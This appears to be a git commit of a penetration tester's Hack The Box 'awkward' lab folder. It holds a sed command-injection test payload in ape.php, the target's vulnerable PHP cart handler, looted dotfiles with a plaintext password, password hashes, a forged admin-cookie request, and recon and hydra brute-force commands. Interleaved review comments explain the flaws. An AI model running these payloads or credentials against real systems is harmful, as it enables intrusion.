old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions

0
HTB/awkward/1.txt Normal file

10
HTB/awkward/ape.php Normal file

@@ -0,0 +1,10 @@
<?php
$STORE_HOME = "./";
$item_id="1.txt";
$user_id="admin -n '1e exec id'";
echo("sed -i '{$item_id}' {$STORE_HOME}cart/{$user_id}\n");
system("sed -i '{$item_id}' {$STORE_HOME}cart/{$user_id}");
?>
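Review bot: on the `system("sed -i '{$item_id}' {$STORE_HOME}cart/{$user_id}")` line, `$user_id` is interpolated into the shell command without quoting, so the spaces in the test value split it into a file name plus further sed arguments instead of a single cart path. If this script is kept as a regression case for the cart handler, say so in a comment and pair it with the corrected form: pass each value through `escapeshellarg()` and put `--` before the operands so a value starting with `-` is not read as an option. The `echo` of the assembled command is worth keeping, since it makes the expansion visible.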

BIN
HTB/awkward/backup.tar Normal file

Binary file not shown.

Binary file not shown.


@@ -0,0 +1 @@
/dev/null


@@ -0,0 +1,7 @@
# ~/.bash_logout: executed by bash(1) when login shell exits.
# when leaving the console clear the screen to increase privacy
if [ "$SHLVL" = 1 ]; then
[ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi


@@ -0,0 +1,120 @@
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi


@@ -0,0 +1,94 @@
[Desktop Entry]
Version=1.0
Name=Xpad
Name[af]=Xpad
Name[bg]=Xpad
Name[cs]=Xpad
Name[da]=Xpad
Name[de]=Xpad
Name[en_GB]=Xpad
Name[es]=Xpad
Name[et]=Xpad
Name[fi]=Xpad
Name[fr]=Xpad
Name[ga]=Xpad
Name[hr]=Xpad
Name[hu]=Xpad
Name[it]=Xpad
Name[ja]=Xpad
Name[ko]=Xpad
Name[lv]=Xpad
Name[nl]=Xpad
Name[pt]=Xpad
Name[ro]=Xpad
Name[ru]=Xpad
Name[sv]=Xpad
Name[th]=Xpad
Name[tr]=Xpad
Name[vi]=Xpad
Name[zh_CN]=Xpad
Name[zh_TW]=Xpad
GenericName=Sticky Notes
GenericName[af]=Plaknotas (klewerig)
GenericName[bg]=Лепкави бележки
GenericName[cs]=Lepící poznámky
GenericName[da]=Selvklæbende noter
GenericName[de]=Klebezettel
GenericName[en_GB]=Sticky Notes
GenericName[es]=Notas adhesivas
GenericName[et]=Märkmepaberid
GenericName[fi]=Liimalappumuistiinpanot
GenericName[fr]=Notes adhésives
GenericName[ga]=Nótaí Greamaitheacha
GenericName[hr]=Post-it papirići
GenericName[hu]=Ragadós jegyzetek
GenericName[it]=Foglietti adesivi
GenericName[ja]=付箋
GenericName[ko]=Sticky Notes
GenericName[lv]=Līmlapiņas
GenericName[nl]=Memo's
GenericName[pt]=Notas colantes
GenericName[ro]=Note Lipicioase(sticky)
GenericName[ru]=Cтикеры
GenericName[sv]=Klistriga anteckningar
GenericName[vi]=Ghi chép bám dính
GenericName[zh_CN]=自粘性备注
GenericName[zh_TW]=自粘性便條
Comment=Jot down notes for later
Comment[af]=Maak notas vir later
Comment[bg]=Запазване на бележките за по-късно
Comment[cs]=Odsunout níže na později
Comment[da]=Krads noter ned til senere brug
Comment[de]=Notizen für später notieren
Comment[en_GB]=Jot down notes for later
Comment[es]=Anotar para más tarde
Comment[et]=Kiirete märkmete tegemine edaspidiseks
Comment[fi]=Raapusta muistiin myöhempää käyttöä varten
Comment[fr]=Prendre des notes pour plus tard
Comment[ga]=Breac nótaí le léamh ar ball
Comment[hr]=Zapiši bilješku za poslije
Comment[hu]=Jegyzetek felvitele későbbi használatra
Comment[it]=Prendi delle note da ricordare
Comment[ja]=手早くメモを取る
Comment[nl]=Notities maken voor later
Comment[pt]=Anotar para mais tarde
Comment[ro]=Notiţe pentru mai târziu
Comment[ru]=Заметки/стикеры на вашем рабочем столе
Comment[sv]=Plita ner anteckningar för senare användning
Comment[vi]=Ghi nhanh chú thích đến sau
Comment[zh_CN]=简要记录备注以备日后使用
Comment[zh_TW]=大略記下備註以供之後使用
TryExec=xpad
Exec=xpad
Terminal=false
Icon=xpad
StartupNotify=true
StartupWMClass=xpad
Type=Application
Categories=GTK;Utility;
X-LXQt-Need-Tray=true
Keywords=notes;postit

Binary file not shown.


@@ -0,0 +1,35 @@
[Data Source]
DisplayName[de]=Standard-Proxy-Einstellungen
DisplayName[el]=Προεπιλεγμένες ρυθμίσεις διαμεσολαβητή
DisplayName[en_GB]=Default Proxy Settings
DisplayName[fi]=Välityspalvelimen oletusasetukset
DisplayName[fr]=Réglages par défaut du serveur mandataire
DisplayName[it]=Impostazioni proxy predefinite
DisplayName[lv]=Noklusējuma starpnieka iestatījumi
DisplayName[ms]=Tetapan Proksi Lalai
DisplayName[nb]=Forvalgte innstillinger for mellomtjener
DisplayName[nl]=Standaardproxy-instellingen
DisplayName[pl]=Domyślne ustawienia pośrednika
DisplayName[ro]=Configurări implicite proxy
DisplayName[sr]=Подразумевана подешавања посредника
DisplayName[zh_TW]=預設 Proxy 設定
DisplayName=Default Proxy Settings
Enabled=true
Parent=
[Proxy]
Method=default
IgnoreHosts=localhost;127.0.0.0/8;::1;
AutoconfigUrl=
FtpHost=
FtpPort=0
HttpAuthPassword=
HttpAuthUser=
HttpHost=
HttpPort=8080
HttpUseAuth=false
HttpsHost=
HttpsPort=0
SocksHost=
SocksPort=0


@@ -0,0 +1 @@
yes


@@ -0,0 +1,5 @@
file:///home/bean/Documents
file:///home/bean/Music
file:///home/bean/Pictures
file:///home/bean/Videos
file:///home/bean/Downloads


@@ -0,0 +1,7 @@
# This file is created by ibus-daemon, please do not modify it.
# This file allows processes on the machine to find the
# ibus session bus with the below address.
# If the IBUS_ADDRESS environment variable is set, it will
# be used rather than this file.
IBUS_ADDRESS=unix:abstract=/home/bean/.cache/ibus/dbus-aFcG5feC,guid=3dec9de0e2cbb2442d14006463230e0b
IBUS_DAEMON_PID=2079


@@ -0,0 +1,7 @@
# This file is created by ibus-daemon, please do not modify it.
# This file allows processes on the machine to find the
# ibus session bus with the below address.
# If the IBUS_ADDRESS environment variable is set, it will
# be used rather than this file.
IBUS_ADDRESS=unix:abstract=/home/bean/.cache/ibus/dbus-aFcG5feC,guid=3dec9de0e2cbb2442d14006463230e0b
IBUS_DAEMON_PID=2079


@@ -0,0 +1,2 @@
Éö$÷¦˝ţe°Ň„‘‹ş¤şöXĎ6ńˉ*xóě‡&ś4^řB$ď_@ňäRLJ7şÖĚ5ˇ'`X-ślć@Ë«H‰]Ĺ/—1}ňŮŔX·‰bßÓWŤC©m|ƶ.‰Ňű˘@^+_Ŕé¤0¤¦äÖ
«ýž`łŚĘOí˘


@@ -0,0 +1,15 @@
# This file is written by xdg-user-dirs-update
# If you want to change or add directories, just edit the line you're
# interested in. All local changes will be retained on the next run.
# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
# absolute path. No other format is supported.
#
XDG_DESKTOP_DIR="$HOME/Desktop"
XDG_DOWNLOAD_DIR="$HOME/Downloads"
XDG_TEMPLATES_DIR="$HOME/Templates"
XDG_PUBLICSHARE_DIR="$HOME/Public"
XDG_DOCUMENTS_DIR="$HOME/Documents"
XDG_MUSIC_DIR="$HOME/Music"
XDG_PICTURES_DIR="$HOME/Pictures"
XDG_VIDEOS_DIR="$HOME/Videos"


@@ -0,0 +1 @@
en_AU


@@ -0,0 +1,14 @@
TO DO:
- Get real hat prices / stock from Christine
- Implement more secure hashing mechanism for HR system
- Setup better confirmation message when adding item to cart
- Add support for item quantity > 1
- Implement checkout system
boldHR SYSTEM/bold
bean.hill
014mrbeanrules!#P
https://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-esc.html
boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold


@@ -0,0 +1,23 @@
decorations 0
height 200
width 200
confirm_destroy 1
edit_lock 0
sticky_on_start 0
tray_enabled 1
tray_click_configuration 1
back rgb(255,238,153)
use_back 1
text rgb(0,0,0)
use_text 1
fontname Sans 9
toolbar 1
auto_hide_toolbar 1
scrollbar 1
buttons New, Delete, Separator, Cut, Copy, Paste, Separator, Undo, Redo
autostart_wait_systray 1
autostart_delay 0
autostart_new_pad 0
autostart_display_pads 2
hide_from_taskbar 0
hide_from_task_switcher 0


@@ -0,0 +1,12 @@
width 383
height 450
x 0
y 0
follow_font 1
follow_color 1
sticky 0
hidden 0
back rgb(255,238,153)
text rgb(0,0,0)
fontname Sans 9
content content-DS1ZS1

Binary file not shown.

Binary file not shown.


@@ -0,0 +1,6 @@
BEGIN:VCALENDAR
CALSCALE:GREGORIAN
PRODID:-//Ximian//NONSGML Evolution Calendar//EN
VERSION:2.0
X-EVOLUTION-DATA-REVISION:2022-09-15T11:35:40.604383Z(1)
END:VCALENDAR


@@ -0,0 +1,8 @@
<?xml version="1.0"?>
<application-state>
<context id="">
<application id="xpad.desktop" score="10" last-seen="1663242380"/>
<application id="gnome-initial-setup.desktop" score="1" last-seen="1663241771"/>
<application id="org.gnome.Terminal.desktop" score="69" last-seen="1663242380"/>
</context>
</application-state>


@@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<xbel version="1.0"
xmlns:bookmark="http://www.freedesktop.org/standards/desktop-bookmarks"
xmlns:mime="http://www.freedesktop.org/standards/shared-mime-info"
></xbel>


@@ -0,0 +1,3 @@
[State]
timestamp=1663241738
migrated=ubuntu-settings-migrate-to-defaults.18.10.1.py;yaru-theme-gtk-abandon-Yaru-light.sh;dark-theme-migration.sh;unity-gnome-shell-migration.17.10.py;


@@ -0,0 +1,27 @@
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
PATH="$HOME/.local/bin:$PATH"
fi


@@ -0,0 +1,8 @@
#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp
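Review bot: neither `mkdir` nor the two `cd` calls are checked, so if `cd /home/bean/Documents/backup_tmp` fails, the second `tar -czvf ... .` archives whatever directory the script is still in, and `rm -r` runs regardless. Add `set -euo pipefail` near the top or write `cd ... || exit 1`, and create the staging directory with `mktemp -d` instead of a fixed name. The first `tar` also has no `--exclude` for `Documents/backup` or `Documents/backup_tmp`, both of which sit under the directory being archived, so each run picks up the previous `bean_backup_final.tar.gz`. Since the archive holds the whole home directory apart from `.npm`, `.cache` and `.vscode`, set a restrictive `umask` before writing it.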


@@ -0,0 +1 @@
/home/bean/.config/dconf/user


@@ -0,0 +1,9 @@
<fontconfig>
<dir>/snap/snapd-desktop-integration/14/gnome-platform/usr/share/fonts</dir>
<dir>/usr/local/share//fonts</dir>
<dir>/usr/share//fonts</dir>
<include ignore_missing="yes">/etc/fonts/conf.d</include>
<include ignore_missing="yes">conf.d</include>
<cachedir prefix="xdg">fontconfig</cachedir>
<cachedir>/var/snap/snapd-desktop-integration/common/fontconfig</cachedir>
</fontconfig>


@@ -0,0 +1 @@
/home/bean/.config/gtk-2.0/gtkfilechooser.ini


@@ -0,0 +1 @@
/home/bean/.config/gtk-3.0/bookmarks


@@ -0,0 +1 @@
/home/bean/.config/gtk-3.0/settings.ini


@@ -0,0 +1 @@
/home/bean/.config/ibus/bus


@@ -0,0 +1,15 @@
# This file is written by xdg-user-dirs-update
# If you want to change or add directories, just edit the line you're
# interested in. All local changes will be retained on the next run.
# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
# absolute path. No other format is supported.
#
XDG_DESKTOP_DIR="/home/bean/Desktop"
XDG_DOWNLOAD_DIR="/home/bean/Downloads"
XDG_TEMPLATES_DIR="/home/bean/Templates"
XDG_PUBLICSHARE_DIR="/home/bean/Public"
XDG_DOCUMENTS_DIR="/home/bean/Documents"
XDG_MUSIC_DIR="/home/bean/Music"
XDG_PICTURES_DIR="/home/bean/Pictures"
XDG_VIDEOS_DIR="/home/bean/Videos"


@@ -0,0 +1 @@
e96ec7012d30be266ba6e6d81e88228d -


@@ -0,0 +1 @@
391bd5c3f2a3493e8bddeba3e6c73f31 -


@@ -0,0 +1 @@
SNAP_DESKTOP_LAST_REVISION=14


@@ -0,0 +1 @@
/snap/snapd-desktop-integration/14/data-dir/themes


@@ -0,0 +1 @@
/snap/snapd-desktop-integration/14/data-dir/themes


@@ -0,0 +1 @@
14


@@ -0,0 +1 @@
Thu 15 Sep 2022 21:46:25 AEST

0
HTB/awkward/cart/admin Normal file


@@ -0,0 +1,107 @@
<?php
$STORE_HOME = "/var/www/store/";
//check for valid hat valley store item
function checkValidItem($filename) {
if(file_exists($filename)) {
$first_line = file($filename)[0];
if(strpos($first_line, "***Hat Valley") !== FALSE) {
return true;
}
}
return false;
}
//add to cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'add_item' && $_POST['item'] && $_POST['user']) {
$item_id = $_POST['item'];
$user_id = $_POST['user'];
$bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!
foreach($bad_chars as $bad) {
if(strpos($item_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
foreach($bad_chars as $bad) {
if(strpos($user_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
if(checkValidItem("{$STORE_HOME}product-details/{$item_id}.txt")) {
if(!file_exists("{$STORE_HOME}cart/{$user_id}")) {
system("echo '***Hat Valley Cart***' > {$STORE_HOME}cart/{$user_id}");
}
system("head -2 {$STORE_HOME}product-details/{$item_id}.txt | tail -1 >> {$STORE_HOME}cart/{$user_id}");
echo "Item added successfully!";
}
else {
echo "Invalid item";
}
exit;
}
//delete from cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'delete_item' && $_POST['item'] && $_POST['user']) {
$item_id = $_POST['item'];
$user_id = $_POST['user'];
$bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!
foreach($bad_chars as $bad) {
if(strpos($item_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
foreach($bad_chars as $bad) {
if(strpos($user_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
echo "Item removed from cart";
}
else {
echo "Invalid item";
}
exit;
}
//fetch from cart
if ($_SERVER['REQUEST_METHOD'] === 'GET' && $_GET['action'] === 'fetch_items' && $_GET['user']) {
$html = "";
$dir = scandir("{$STORE_HOME}cart");
$files = array_slice($dir, 2);
foreach($files as $file) {
$user_id = substr($file, -18);
if($user_id === $_GET['user'] && checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
$product_file = fopen("{$STORE_HOME}cart/{$file}", "r");
$details = array();
while (($line = fgets($product_file)) !== false) {
if(str_replace(array("\r", "\n"), '', $line) !== "***Hat Valley Cart***") { //don't include first line
array_push($details, str_replace(array("\r", "\n"), '', $line));
}
}
foreach($details as $cart_item) {
$cart_items = explode("&", $cart_item);
for($x = 0; $x < count($cart_items); $x++) {
$cart_items[$x] = explode("=", $cart_items[$x]); //key and value as separate values in subarray
}
$html .= "<tr><td>{$cart_items[1][1]}</td><td>{$cart_items[2][1]}</td><td>{$cart_items[3][1]}</td><td><button data-id={$cart_items[0][1]} onclick=\"removeFromCart(this, localStorage.getItem('user'))\" class='remove-item'>Remove</button></td></tr>";
}
}
}
echo $html;
exit;
}
?>
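Review bot: the `$bad_chars` denylist in both the add and delete branches leaves out space, single quote, `-` and `/`, yet `$item_id` and `$user_id` are then interpolated into `system()` commands: unquoted in the `{$STORE_HOME}cart/{$user_id}` path, and inside single quotes in `sed -i '/item_id={$item_id}/d' ...`. Replace the denylist with an allowlist (digits only for the item, a fixed pattern for the user) and wrap every interpolated value in `escapeshellarg()`, or better, drop the shell and do the append and the line removal with PHP file functions. In the fetch branch, `checkValidItem()` is called on `cart/{$user_id}` while the file actually opened is `cart/{$file}`, and the cart fields are written into `$html` without `htmlspecialchars()`; both should be corrected in the same pass.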


@@ -0,0 +1 @@
{"scans":[{"id":"d7aaa3dde5404e86a522802fd6c4a9c2","url":"http://awkward.htb:80/","normalized_url":"http://awkward.htb:80/","scan_type":"Directory","status":"Running","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://awkward.htb:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://awkward.htb/","original_url":"http://awkward.htb:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":132,"line_count":8,"word_count":13,"headers":{"content-type":"text/html","etag":"\"63231b83-84\"","accept-ranges":"bytes","content-length":"132","connection
":"keep-alive","last-modified":"Thu, 15 Sep 2022 12:33:07 GMT","server":"nginx/1.18.0 (Ubuntu)","date":"Tue, 07 Feb 2023 22:18:04 GMT"},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":1424,"expected_per_scan":833000,"total_expected":833000,"errors":0,"successes":3,"redirects":0,"client_errors":1421,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":3,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":1,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]}

File diff suppressed because one or more lines are too long

1
HTB/awkward/hash Normal file

@@ -0,0 +1 @@
admin:$apr1$lfvrwhqi$hd49MbBX3WNluMezyjWls1
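Review bot: the single added line is an htpasswd-style entry for `admin` in the `$apr1$` (Apache MD5) format, which is cheap to compute by current standards, and committing it exposes the hash to anyone who can read the repository. Keep the file out of version control, and if the source deployment still relies on this entry, regenerate it with bcrypt (`htpasswd -B`) and a new password.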

4
HTB/awkward/hashes.txt Normal file

@@ -0,0 +1,4 @@
christine.wool:6529fc6e43f9061ff4eaa806b087b13747fbe8ae0abfd396a5c4cb97c5941649
christopher.jones:e59ae67897757d1a138a46c1f501ce94321e96aa7ec4445e0e97e94f2ec6c8e1
jackson.lightheart:b091bc790fe647a0d7e8fb8ed9c4c01e15c77920a42ccd0deaca431a44ea0436
bean.hill:37513684de081222aaded9b8391d541ae885ce3b55942b9ac6978ad6f6e1811f
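Review bot: these four `username:digest` lines put credential material into the tree, and each digest is 64 hex characters with no salt or algorithm field beside it, so two accounts with the same password would show the same value. Keep files like this out of version control; on the application side, store passwords with a salted, deliberately slow scheme such as bcrypt or Argon2, which matches the TO DO item elsewhere in this commit about a more secure hashing mechanism for the HR system.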

14
HTB/awkward/leave.req Normal file

@@ -0,0 +1,14 @@
POST /api/submit-leave HTTP/1.1
Host: hat-valley.htb
Content-Length: 59
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/json
Origin: http://hat-valley.htb
Referer: http://hat-valley.htb/leave
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: token=admin
Connection: close
{"reason":"reason","start":"01/01/1970","end":"01/01/1970"}


@@ -0,0 +1,8 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.


@@ -0,0 +1,32 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" awkward.htb
feroxbuster -u http://awkward.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://awkward.htb:80/.well-known/security.txt
curl -sSikf http://awkward.htb:80/robots.txt
curl -sSik http://awkward.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" awkward.htb
curl -sk -o /dev/null -H "Host: rWvDCpAWlRnZAXFIltAG.awkward.htb" http://awkward.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://awkward.htb:80 2>&1
wkhtmltoimage --format png http://awkward.htb:80/ /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://awkward.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.awkward.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_awkward.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml" awkward.htb


@@ -0,0 +1,10 @@
[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1).
[-] Command: wkhtmltoimage --format png http://awkward.htb:80/ /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_screenshot.png
[-] Error Output:
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
[==================> ] 30%
[============================================================] 100%
Error: Failed to load http://hat-valley.htb/, with network status code 3 and http status code 0 - Host hat-valley.htb not found
[============================================================] 100%


@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb


@@ -0,0 +1,32 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://awkward.htb
